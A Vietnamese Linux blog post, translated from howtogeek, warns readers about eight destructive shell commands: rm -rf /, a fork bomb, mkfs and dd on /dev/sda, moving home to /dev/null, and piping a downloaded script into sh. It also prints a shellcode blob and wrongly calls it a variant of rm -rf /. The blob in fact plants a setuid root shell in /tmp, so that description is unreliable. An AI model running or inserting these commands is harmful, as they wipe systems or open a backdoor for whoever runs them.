Thứ Sáu, 7 tháng 7, 2017

8 câu lệnh KHÔNG BAO GIỜ được chạy



Khi sử dụng các distro của Linux, chắc hẳn các bạn sẽ mò vọc các lệnh trên Terminal để tìm hiểu tác dụng của nó. Đi kèm với khả năng vô biên của mình thì cũng sẽ có các câu lệnh có tác dụng gây hỏng hệ thống của bạn không thương tiếc.
Để phòng chống thì cách tốt nhất là tìm hiểu về nó, sau đây mình sẽ giới thiệu đến các bạn 8 câu lệnh không bao giờ được chạy!!

Hãy xóa tất cả!

[[mcode]]$ rm -rf /[[ecode]]
Câu lệnh thì chắc các bạn đã quá quen thuộc rồi, tuy nhiên nó sẽ là một trò chơi khăm nhanh gọn đối với các bạn newbie đấy.
Chú thích:
[[scode]]rm[[escode]] : Lệnh này sẽ xóa tham số mà bạn nhập vào sau nó, có thể là một tập tin hay một thư mục.
[[scode]]-r[[escode]] : Tham số này yêu cầu xóa hết tất các thư mục con và tập tin bên trong.
[[scode]]-f[[escode]] : Tham số f sẽ tự động xóa các mục yêu cầu mà không cần hỏi lại.
[[scode]]/[[escode]] : Là thư mục gốc, hay còn gọi là thư mục root.
Như vậy các bạn đã hiểu chưa, lệnh này sẽ yêu cầu xóa tất cả những file và folder trên máy. Ngoài ra thì nó còn có những cách sử dụng khác mà hậu quả gây ra cũng không kém như [[scode]]rm -f *[[escode]] sẽ xóa hết tất cả những gì trong thư mục home của bạn hay [[scode]]rm -rf .*[[escode]] sẽ xóa tất cả những file cấu hình.
Bài học: Hãy cẩn thân khi dùng lệnh [[scode]]rm -rf[[escode]].

Biến thể của rm –rf /

[[mcode]]$ char esp[] __attribute__ ((section(“.text”))) /* esp
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68”
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99”
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7”
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56”
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31”
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69”
“\x6e\x2f\x73\x68\x00\x2d\x63\x00”
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;[[ecode]]
Đây cũng là một biến thể dạng hex của lệnh [[scode]]rm -rf /[[escode]] ở trên thôi.
Bài học: Đừng cho chạy bất cứ lệnh gì mà ta chưa biết công dụng của nó, hãy tìm hiểu.

Bomb !!!


[[mcode]]$ :(){ :|: & };:[[ecode]]
Đây là một quả bomb tự nhân bản, một vòng lặp vô tân. Nó tự tạo ra bản sao của nó rồi từ bạn sao lại như nhân bản thêm nữa. Cứ như vậy nó sẽ chiếm dụng hết CPU và RAM gây ra crash. Hiểu đơn giản thì nó giống như ta "tự ddos" vậy.
Bài học: Nhỏ nhưng có võ.

Định dạng ổ cứng

[[mcode]]$ mkfs.ext4 /dev/sda1[[ecode]]
Lệnh này sẽ tạo định dạng (format) lại phân vùng ext4 trên ổ cứng [[scode]]sda1[[escode]] (thông thường là phân vùng hệ thống) cũng giống như là bạn format ổ C: trên Windows vậy.
Về tác dụng phụ thì nó chẳng khác gì lệnh [[scode]]rm -rf /[[escode]] trên kia, xóa sạch!
Bài học: Hãy cẩn thận khi chạy các lệnh liên quan thư mục [[scode]]/dev/sd[[escode]]...

Ghi dữ liệu trực tiêp vào ổ cứng.


[[mcode]]$ [command] > /dev/sda[[ecode]]
Dấu [[scode]]>[[escode]] trên Terminal có nghĩa là ghi output của một lệnh ra một file nào đó, nhưng trong trường hợp này thì nó ghi thẳng vào các sector của ổ cứng [[scode]]sda[[escode]] và làm hỏng hệ thống tập tin gây mất mát dữ liệu.
Bài học: Như đã nói ở trên, hãy cẩn thận với các lệnh chạy liên quan đến [[scode]]/dev/sd[[escode]]...

Ném một đống rác vảo ổ cứng

[[mcode]]$ dd if=/dev/random of=/dev/sda[[ecode]]
Bạn có thể đọc về lệnh dd tại đây. Lệnh này cũng như ở trên, nhưng ở đây thay vì giá trị đầu ra của một thứ gì đó cụ thể thì ở đây, dữ liệu sẽ được sinh ngẫu nhiên và viết trực tiếp lên ổ cứng.
Bài học: Lệnh [[scode]]dd[[escode]] sẽ copy dữ liệu từ một nơi này sang một nơi khác, và nó rất hiệu quả trong một số trường hợp, nhưng cũng sẽ gây hậu quả nghiêm trọng nếu bạn không sử dụng cẩn thận.

Đem thử mục Home bỏ vào "lỗ đen"

[[mcode]]$ mv ~ /dev/null[[ecode]]
Lệnh [[scode]]mv[[escode]] thì đã quá quen thuộc với các bạn sử dụng linux, lệnh này có tác dụng di chuyển (move) một tập tin hay một thư mục và đổi tên nếu được yêu cầu. Ở ví dụ trên, ký tự [[scode]]~[[escode]] đại diện cho thư mục home của bạn và lệnh [[scode]]mv[[escode]] sẽ di chuyển thư mục home của bạn vào một vùng trống [[scode]]/dev/null[[escode]]. Nó sẽ hủy tất cả những thứ được đưa vào đấy, có thể hiểu hay gọi nó là "lỗ đen".
Bài học: Hãy thận trọng với thư mục [[scode]]~[[escode]] (home) và cả thư mục [[scode]]/[[escode]] (root) nữa.

Tải và chạy một script:

[[mcode]]$ wget http://example.com/something -O – | sh[[ecode]]
Dòng trên tải xuống một script từ web và thực thi nó với lệnh sh, và nó sẽ chạy các lệnh trong script đó. Điều này có thể nguy hiểm nếu bạn không biết chắc chắn script này có tác dụng gì. Hãy mở đường link url trên trình duyệt và tìm hiểu trước nhé, biết đâu được trong đó là một hoặc là tất cả 7 lệnh mình giới thiệu trên kia thì sao.
Bài học: không chạy các tập lệnh không đáng tin cậy.

Nguồn dịch từ: howtogeek

Không có nhận xét nào:

Đăng nhận xét

Thông tin

Tự Học Linux là blog hướng dẫn người dùng sử dụng các hệ điều hành mã nguồn mở nhân Linux. Blog gồm các bài viết hướng dẫn sử dụng, thủ thuật cũng như sửa lỗi gặp phải trong quá trình sử dụng. Bài viết có thể được dịch hoặc tham khảo từ nhiều nguồn (xem cuối bài viết), vui lòng dẫn nguồn Tự Học Linux nếu bạn phát hành lại bài viết của Blog. Cảm ơn các bạn đọc đã ủng hộ!

Người đóng góp cho blog